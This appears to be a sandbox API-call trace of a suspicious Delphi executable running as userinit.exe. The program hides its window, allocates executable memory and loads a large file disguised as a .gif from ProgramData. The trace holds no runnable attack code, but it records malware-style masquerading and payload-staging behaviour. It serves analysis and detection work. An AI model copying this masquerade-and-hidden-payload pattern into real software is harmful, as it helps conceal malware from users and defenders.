[0157.560] LoadStringA (in: hInstance=0x400000, uID=0xff3e, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0157.560] LoadStringA (in: hInstance=0x400000, uID=0xff3d, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0157.560] LoadStringA (in: hInstance=0x400000, uID=0xff3c, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0157.560] LoadStringA (in: hInstance=0x400000, uID=0xff3b, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0157.560] LoadStringA (in: hInstance=0x400000, uID=0xff3a, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0157.560] LoadStringA (in: hInstance=0x400000, uID=0xff39, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0157.560] LoadStringA (in: hInstance=0x400000, uID=0xff38, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0157.560] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0157.560] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0157.560] GetVersion () returned 0x1db10106
[0157.560] GetCurrentProcessId () returned 0x174
[0157.560] GlobalAddAtomA (lpString="Delphi00000174") returned 0xc119
[0157.560] GetCurrentThreadId () returned 0x6e4
[0157.560] GlobalAddAtomA (lpString="ControlOfs00400000000006E4") returned 0xc118
[0157.560] RegisterClipboardFormatA (lpszFormat="ControlOfs00400000000006E4") returned 0xc164
[0157.561] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0157.561] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0157.561] GetSystemMetrics (nIndex=19) returned 1
[0157.568] GetSystemMetrics (nIndex=75) returned 1
[0157.568] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x471310, fWinIni=0x0 | out: pvParam=0x471310) returned 1
[0157.568] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0157.568] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0157.569] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0x2011f
[0157.569] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0157.569] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0157.569] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0157.569] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0x150105
[0157.570] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0xd0135
[0157.570] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0xf01bd
[0157.570] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0x80145
[0157.570] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0xc022d
[0157.571] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0x90229
[0157.571] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0157.571] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0157.571] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0157.571] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0157.571] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0157.571] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0157.571] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0157.571] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0157.571] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0157.571] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0157.571] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0157.571] GetDC (hWnd=0x0) returned 0x480107e1
[0157.571] GetDeviceCaps (hdc=0x480107e1, index=90) returned 96
[0157.571] ReleaseDC (hWnd=0x0, hDC=0x480107e1) returned 1
[0157.571] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0157.572] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x444d6c, dwData=0x47155c) returned 1
[0157.572] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x24f88f, fWinIni=0x0 | out: pvParam=0x24f88f) returned 1
[0157.572] CreateFontIndirectA (lplf=0x24f88f) returned 0x180a088a
[0157.572] GetObjectA (in: h=0x180a088a, c=60, pv=0x24f680 | out: pv=0x24f680) returned 60
[0157.572] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x24f73b, fWinIni=0x0 | out: pvParam=0x24f73b) returned 1
[0157.572] CreateFontIndirectA (lplf=0x24f817) returned 0x230a0874
[0157.572] GetObjectA (in: h=0x230a0874, c=60, pv=0x24f680 | out: pv=0x24f680) returned 60
[0157.572] CreateFontIndirectA (lplf=0x24f7db) returned 0x5e0a0846
[0157.572] GetObjectA (in: h=0x5e0a0846, c=60, pv=0x24f680 | out: pv=0x24f680) returned 60
[0157.573] LoadIconA (hInstance=0x400000, lpIconName="MAINICON") returned 0x0
[0157.573] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x24f7ef, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0157.573] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0x24f7ef | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0157.573] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x1a0000
[0157.573] GetClassInfoA (in: hInstance=0x400000, lpClassName="TApplication", lpWndClass=0x24f7a4 | out: lpWndClass=0x24f7a4) returned 0
[0157.573] RegisterClassA (lpWndClass=0x451c88) returned 0x20c167
[0157.573] GetSystemMetrics (nIndex=0) returned 1440
[0157.573] GetSystemMetrics (nIndex=1) returned 900
[0157.573] CreateWindowExA (dwExStyle=0x0, lpClassName="TApplication", lpWindowName="userinit", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0xb01e6
[0157.578] SetWindowLongA (hWnd=0xb01e6, nIndex=-4, dwNewLong=1708015) returned 4219500
[0157.578] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0157.578] SendMessageA (hWnd=0xb01e6, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0157.578] DefWindowProcA (hWnd=0xb01e6, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0157.591] DefWindowProcA (hWnd=0xb01e6, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0xa0221
[0157.592] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0157.592] SetClassLongA (hWnd=0xb01e6, nIndex=-14, dwNewLong=65575) returned 0x0
[0157.593] GetSystemMenu (hWnd=0xb01e6, bRevert=0) returned 0xb0217
[0157.595] DeleteMenu (hMenu=0xb0217, uPosition=0xf030, uFlags=0x0) returned 1
[0157.595] DeleteMenu (hMenu=0xb0217, uPosition=0xf000, uFlags=0x0) returned 1
[0157.595] DeleteMenu (hMenu=0xb0217, uPosition=0xf010, uFlags=0x0) returned 1
[0157.595] GetKeyboardLayoutList (in: nBuff=64, lpList=0x24f770 | out: lpList=0x24f770) returned 1
[0157.596] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0157.596] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0157.597] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6d7b0000
[0157.597] GetProcAddress (hModule=0x6d7b0000, lpProcName="InitializeFlatSB") returned 0x6d7e266f
[0157.597] GetProcAddress (hModule=0x6d7b0000, lpProcName="UninitializeFlatSB") returned 0x6d7e2542
[0157.597] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollProp") returned 0x6d7e1d29
[0157.597] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollProp") returned 0x6d7e238d
[0157.597] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_EnableScrollBar") returned 0x6d7e20c9
[0157.597] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_ShowScrollBar") returned 0x6d7e1fdb
[0157.597] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollRange") returned 0x6d7e1e8d
[0157.597] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollInfo") returned 0x6d7e1f0f
[0157.597] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollPos") returned 0x6d7e1ccd
[0157.597] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollPos") returned 0x6d7e216d
[0157.597] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollInfo") returned 0x6d7e22be
[0157.598] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollRange") returned 0x6d7e21e2
[0157.598] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0157.598] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0157.598] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0157.598] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0157.598] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0157.598] GetCurrentThreadId () returned 0x6e4
[0157.598] GlobalAddAtomA (lpString="WndProcPtr00400000000006E4") returned 0xc117
[0157.598] VirtualAlloc (lpAddress=0x474000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x474000
[0157.598] ShowWindow (hWnd=0xb01e6, nCmdShow=0) returned 0
[0157.599] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0157.599] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmg.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmg.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98
[0157.599] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x24f4f0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x24f4f0*=0) returned 0x0
[0157.599] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x24f4e8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x24f4e8*=0) returned 0x0
[0157.599] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x24f4e8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x24f4e8*=0) returned 0x10be00
[0157.599] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x24f4e8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x24f4e8*=0) returned 0x0
[0157.600] GlobalLock (hMem=0x360004) returned 0x900020
[0157.600] ReadFile (in: hFile=0x98, lpBuffer=0x900020, nNumberOfBytesToRead=0x10be00, lpNumberOfBytesRead=0x24f504, lpOverlapped=0x0 | out: lpBuffer=0x900020*, lpNumberOfBytesRead=0x24f504*=0x10be00, lpOverlapped=0x0) returned 1
[0157.645] CloseHandle (hObject=0x98) returned 1
[0157.645] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.646] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.646] GlobalUnlock (hMem=0x36000c) returned 0
[0157.646] GlobalReAlloc (hMem=0x36000c, dwBytes=0x4000, uFlags=0x2) returned 0x36000c
[0157.646] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.647] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.647] GlobalUnlock (hMem=0x36000c) returned 0
[0157.647] GlobalReAlloc (hMem=0x36000c, dwBytes=0x6000, uFlags=0x2) returned 0x36000c
[0157.648] GlobalLock (hMem=0x36000c) returned 0x64a820
[0157.649] GlobalHandle (pMem=0x64a820) returned 0x36000c
[0157.649] GlobalUnlock (hMem=0x36000c) returned 0
[0157.649] GlobalReAlloc (hMem=0x36000c, dwBytes=0x8000, uFlags=0x2) returned 0x36000c
[0157.649] GlobalLock (hMem=0x36000c) returned 0x650830
[0157.650] GlobalHandle (pMem=0x650830) returned 0x36000c
[0157.650] GlobalUnlock (hMem=0x36000c) returned 0
[0157.650] GlobalReAlloc (hMem=0x36000c, dwBytes=0xa000, uFlags=0x2) returned 0x36000c
[0157.650] GlobalLock (hMem=0x36000c) returned 0x650830
[0157.651] GlobalHandle (pMem=0x650830) returned 0x36000c
[0157.651] GlobalUnlock (hMem=0x36000c) returned 0
[0157.651] GlobalReAlloc (hMem=0x36000c, dwBytes=0xc000, uFlags=0x2) returned 0x36000c
[0157.652] GlobalLock (hMem=0x36000c) returned 0x65a840
[0157.653] GlobalHandle (pMem=0x65a840) returned 0x36000c
[0157.653] GlobalUnlock (hMem=0x36000c) returned 0
[0157.653] GlobalReAlloc (hMem=0x36000c, dwBytes=0xe000, uFlags=0x2) returned 0x36000c
[0157.653] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.654] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.654] GlobalUnlock (hMem=0x36000c) returned 0
[0157.654] GlobalReAlloc (hMem=0x36000c, dwBytes=0x10000, uFlags=0x2) returned 0x36000c
[0157.654] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.655] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.655] GlobalUnlock (hMem=0x36000c) returned 0
[0157.655] GlobalReAlloc (hMem=0x36000c, dwBytes=0x12000, uFlags=0x2) returned 0x36000c
[0157.655] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.656] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.656] GlobalUnlock (hMem=0x36000c) returned 0
[0157.656] GlobalReAlloc (hMem=0x36000c, dwBytes=0x14000, uFlags=0x2) returned 0x36000c
[0157.656] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.657] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.657] GlobalUnlock (hMem=0x36000c) returned 0
[0157.657] GlobalReAlloc (hMem=0x36000c, dwBytes=0x16000, uFlags=0x2) returned 0x36000c
[0157.657] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.658] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.658] GlobalUnlock (hMem=0x36000c) returned 0
[0157.658] GlobalReAlloc (hMem=0x36000c, dwBytes=0x18000, uFlags=0x2) returned 0x36000c
[0157.658] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.659] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.659] GlobalUnlock (hMem=0x36000c) returned 0
[0157.659] GlobalReAlloc (hMem=0x36000c, dwBytes=0x1a000, uFlags=0x2) returned 0x36000c
[0157.659] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.660] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.660] GlobalUnlock (hMem=0x36000c) returned 0
[0157.660] GlobalReAlloc (hMem=0x36000c, dwBytes=0x1c000, uFlags=0x2) returned 0x36000c
[0157.660] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.661] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.661] GlobalUnlock (hMem=0x36000c) returned 0
[0157.661] GlobalReAlloc (hMem=0x36000c, dwBytes=0x1e000, uFlags=0x2) returned 0x36000c
[0157.661] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.662] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.662] GlobalUnlock (hMem=0x36000c) returned 0
[0157.662] GlobalReAlloc (hMem=0x36000c, dwBytes=0x20000, uFlags=0x2) returned 0x36000c
[0157.662] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.663] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.663] GlobalUnlock (hMem=0x36000c) returned 0
[0157.663] GlobalReAlloc (hMem=0x36000c, dwBytes=0x22000, uFlags=0x2) returned 0x36000c
[0157.665] GlobalLock (hMem=0x36000c) returned 0x666820
[0157.666] GlobalHandle (pMem=0x666820) returned 0x36000c
[0157.666] GlobalUnlock (hMem=0x36000c) returned 0
[0157.666] GlobalReAlloc (hMem=0x36000c, dwBytes=0x24000, uFlags=0x2) returned 0x36000c
[0157.666] GlobalLock (hMem=0x36000c) returned 0x666820
[0157.667] GlobalHandle (pMem=0x666820) returned 0x36000c
[0157.667] GlobalUnlock (hMem=0x36000c) returned 0
[0157.667] GlobalReAlloc (hMem=0x36000c, dwBytes=0x26000, uFlags=0x2) returned 0x36000c
[0157.669] GlobalLock (hMem=0x36000c) returned 0x68a830
[0157.670] GlobalHandle (pMem=0x68a830) returned 0x36000c
[0157.670] GlobalUnlock (hMem=0x36000c) returned 0
[0157.670] GlobalReAlloc (hMem=0x36000c, dwBytes=0x28000, uFlags=0x2) returned 0x36000c
[0157.670] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.671] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.671] GlobalUnlock (hMem=0x36000c) returned 0
[0157.671] GlobalReAlloc (hMem=0x36000c, dwBytes=0x2a000, uFlags=0x2) returned 0x36000c
[0157.671] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.672] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.672] GlobalUnlock (hMem=0x36000c) returned 0
[0157.672] GlobalReAlloc (hMem=0x36000c, dwBytes=0x2c000, uFlags=0x2) returned 0x36000c
[0157.672] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.673] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.673] GlobalUnlock (hMem=0x36000c) returned 0
[0157.673] GlobalReAlloc (hMem=0x36000c, dwBytes=0x2e000, uFlags=0x2) returned 0x36000c
[0157.673] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.674] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.674] GlobalUnlock (hMem=0x36000c) returned 0
[0157.674] GlobalReAlloc (hMem=0x36000c, dwBytes=0x30000, uFlags=0x2) returned 0x36000c
[0157.674] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.675] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.675] GlobalUnlock (hMem=0x36000c) returned 0
[0157.675] GlobalReAlloc (hMem=0x36000c, dwBytes=0x32000, uFlags=0x2) returned 0x36000c
[0157.675] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.676] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.676] GlobalUnlock (hMem=0x36000c) returned 0
[0157.676] GlobalReAlloc (hMem=0x36000c, dwBytes=0x34000, uFlags=0x2) returned 0x36000c
[0157.676] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.677] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.677] GlobalUnlock (hMem=0x36000c) returned 0
[0157.677] GlobalReAlloc (hMem=0x36000c, dwBytes=0x36000, uFlags=0x2) returned 0x36000c
[0157.677] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.678] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.678] GlobalUnlock (hMem=0x36000c) returned 0
[0157.678] GlobalReAlloc (hMem=0x36000c, dwBytes=0x38000, uFlags=0x2) returned 0x36000c
[0157.678] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.679] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.679] GlobalUnlock (hMem=0x36000c) returned 0
[0157.679] GlobalReAlloc (hMem=0x36000c, dwBytes=0x3a000, uFlags=0x2) returned 0x36000c
[0157.679] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.680] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.680] GlobalUnlock (hMem=0x36000c) returned 0
[0157.680] GlobalReAlloc (hMem=0x36000c, dwBytes=0x3c000, uFlags=0x2) returned 0x36000c
[0157.680] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.680] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.680] GlobalUnlock (hMem=0x36000c) returned 0
[0157.680] GlobalReAlloc (hMem=0x36000c, dwBytes=0x3e000, uFlags=0x2) returned 0x36000c
[0157.681] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.681] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.681] GlobalUnlock (hMem=0x36000c) returned 0
[0157.681] GlobalReAlloc (hMem=0x36000c, dwBytes=0x40000, uFlags=0x2) returned 0x36000c
[0157.681] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.682] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.682] GlobalUnlock (hMem=0x36000c) returned 0
[0157.682] GlobalReAlloc (hMem=0x36000c, dwBytes=0x42000, uFlags=0x2) returned 0x36000c
[0157.682] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.683] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.683] GlobalUnlock (hMem=0x36000c) returned 0
[0157.683] GlobalReAlloc (hMem=0x36000c, dwBytes=0x44000, uFlags=0x2) returned 0x36000c
[0157.683] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.684] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.684] GlobalUnlock (hMem=0x36000c) returned 0
[0157.684] GlobalReAlloc (hMem=0x36000c, dwBytes=0x46000, uFlags=0x2) returned 0x36000c
[0157.684] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.685] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.685] GlobalUnlock (hMem=0x36000c) returned 0
[0157.685] GlobalReAlloc (hMem=0x36000c, dwBytes=0x48000, uFlags=0x2) returned 0x36000c
[0157.685] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.686] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.686] GlobalUnlock (hMem=0x36000c) returned 0
[0157.686] GlobalReAlloc (hMem=0x36000c, dwBytes=0x4a000, uFlags=0x2) returned 0x36000c
[0157.686] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.687] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.687] GlobalUnlock (hMem=0x36000c) returned 0
[0157.687] GlobalReAlloc (hMem=0x36000c, dwBytes=0x4c000, uFlags=0x2) returned 0x36000c
[0157.687] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.688] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.688] GlobalUnlock (hMem=0x36000c) returned 0
[0157.688] GlobalReAlloc (hMem=0x36000c, dwBytes=0x4e000, uFlags=0x2) returned 0x36000c
[0157.688] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.689] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.689] GlobalUnlock (hMem=0x36000c) returned 0
[0157.689] GlobalReAlloc (hMem=0x36000c, dwBytes=0x50000, uFlags=0x2) returned 0x36000c
[0157.689] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.690] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.690] GlobalUnlock (hMem=0x36000c) returned 0
[0157.690] GlobalReAlloc (hMem=0x36000c, dwBytes=0x52000, uFlags=0x2) returned 0x36000c
[0157.690] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.691] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.691] GlobalUnlock (hMem=0x36000c) returned 0
[0157.691] GlobalReAlloc (hMem=0x36000c, dwBytes=0x54000, uFlags=0x2) returned 0x36000c
[0157.691] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.691] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.691] GlobalUnlock (hMem=0x36000c) returned 0
[0157.692] GlobalReAlloc (hMem=0x36000c, dwBytes=0x56000, uFlags=0x2) returned 0x36000c
[0157.692] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.692] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.692] GlobalUnlock (hMem=0x36000c) returned 0
[0157.692] GlobalReAlloc (hMem=0x36000c, dwBytes=0x58000, uFlags=0x2) returned 0x36000c
[0157.692] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.693] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.693] GlobalUnlock (hMem=0x36000c) returned 0
[0157.693] GlobalReAlloc (hMem=0x36000c, dwBytes=0x5a000, uFlags=0x2) returned 0x36000c
[0157.693] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.695] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.695] GlobalUnlock (hMem=0x36000c) returned 0
[0157.695] GlobalReAlloc (hMem=0x36000c, dwBytes=0x5c000, uFlags=0x2) returned 0x36000c
[0157.695] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.695] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.695] GlobalUnlock (hMem=0x36000c) returned 0
[0157.695] GlobalReAlloc (hMem=0x36000c, dwBytes=0x5e000, uFlags=0x2) returned 0x36000c
[0157.695] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.696] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.696] GlobalUnlock (hMem=0x36000c) returned 0
[0157.696] GlobalReAlloc (hMem=0x36000c, dwBytes=0x60000, uFlags=0x2) returned 0x36000c
[0157.696] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.697] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.697] GlobalUnlock (hMem=0x36000c) returned 0
[0157.697] GlobalReAlloc (hMem=0x36000c, dwBytes=0x62000, uFlags=0x2) returned 0x36000c
[0157.697] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.698] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.698] GlobalUnlock (hMem=0x36000c) returned 0
[0157.698] GlobalReAlloc (hMem=0x36000c, dwBytes=0x64000, uFlags=0x2) returned 0x36000c
[0157.698] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.699] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.699] GlobalUnlock (hMem=0x36000c) returned 0
[0157.699] GlobalReAlloc (hMem=0x36000c, dwBytes=0x66000, uFlags=0x2) returned 0x36000c
[0157.699] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.700] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.700] GlobalUnlock (hMem=0x36000c) returned 0
[0157.700] GlobalReAlloc (hMem=0x36000c, dwBytes=0x68000, uFlags=0x2) returned 0x36000c
[0157.700] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.700] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.700] GlobalUnlock (hMem=0x36000c) returned 0
[0157.701] GlobalReAlloc (hMem=0x36000c, dwBytes=0x6a000, uFlags=0x2) returned 0x36000c
[0157.701] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.701] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.701] GlobalUnlock (hMem=0x36000c) returned 0
[0157.701] GlobalReAlloc (hMem=0x36000c, dwBytes=0x6c000, uFlags=0x2) returned 0x36000c
[0157.706] GlobalLock (hMem=0x36000c) returned 0x6b0820
[0157.707] GlobalHandle (pMem=0x6b0820) returned 0x36000c
[0157.707] GlobalUnlock (hMem=0x36000c) returned 0
[0157.707] GlobalReAlloc (hMem=0x36000c, dwBytes=0x6e000, uFlags=0x2) returned 0x36000c
[0157.707] GlobalLock (hMem=0x36000c) returned 0x6b0820
[0157.708] GlobalHandle (pMem=0x6b0820) returned 0x36000c
[0157.708] GlobalUnlock (hMem=0x36000c) returned 0
[0157.708] GlobalReAlloc (hMem=0x36000c, dwBytes=0x70000, uFlags=0x2) returned 0x36000c
[0157.720] GlobalLock (hMem=0x36000c) returned 0xa50048
[0157.721] GlobalHandle (pMem=0xa50048) returned 0x36000c
[0157.721] GlobalUnlock (hMem=0x36000c) returned 0
[0157.721] GlobalReAlloc (hMem=0x36000c, dwBytes=0x72000, uFlags=0x2) returned 0x36000c
[0157.726] GlobalLock (hMem=0x36000c) returned 0xac0058
[0157.727] GlobalHandle (pMem=0xac0058) returned 0x36000c
[0157.727] GlobalUnlock (hMem=0x36000c) returned 0
[0157.727] GlobalReAlloc (hMem=0x36000c, dwBytes=0x74000, uFlags=0x2) returned 0x36000c
[0157.727] GlobalLock (hMem=0x36000c) returned 0xac0058
[0157.728] GlobalHandle (pMem=0xac0058) returned 0x36000c
[0157.728] GlobalUnlock (hMem=0x36000c) returned 0
[0157.728] GlobalReAlloc (hMem=0x36000c, dwBytes=0x76000, uFlags=0x2) returned 0x36000c
[0157.741] GlobalLock (hMem=0x36000c) returned 0x646810
[0157.741] GlobalHandle (pMem=0x646810) returned 0x36000c
[0157.741] GlobalUnlock (hMem=0x36000c) returned 0
[0157.741] GlobalReAlloc (hMem=0x36000c, dwBytes=0x78000, uFlags=0x2) returned 0x36000c
[0157.747] GlobalLock (hMem=0x36000c) returned 0xa50048
[0157.747] GlobalHandle (pMem=0xa50048) returned 0x36000c
[0157.747] GlobalUnlock (hMem=0x36000c) returned 0
[0157.747] GlobalReAlloc (hMem=0x36000c, dwBytes=0x7a000, uFlags=0x2) returned 0x36000c
